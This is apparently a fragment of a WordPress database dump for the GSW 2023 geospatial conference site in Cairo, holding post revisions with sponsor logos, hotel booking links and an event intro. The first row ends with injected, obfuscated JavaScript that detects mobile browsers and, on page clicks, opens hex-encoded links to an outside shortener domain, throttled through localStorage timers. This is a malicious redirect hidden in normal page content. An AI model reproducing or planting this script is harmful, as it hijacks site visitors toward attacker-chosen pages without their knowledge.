_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-10 01:12:00','2023-07-10 01:12:00','',3066,'https://gsw2023.com/?p=4996',0,'revision','',0),
(4997,1,'2023-07-10 01:13:12','2023-07-10 01:13:12','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951482477{margin-top: 80px !important;}\"]<img class=\"alignnone size-medium wp-image-4987 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" 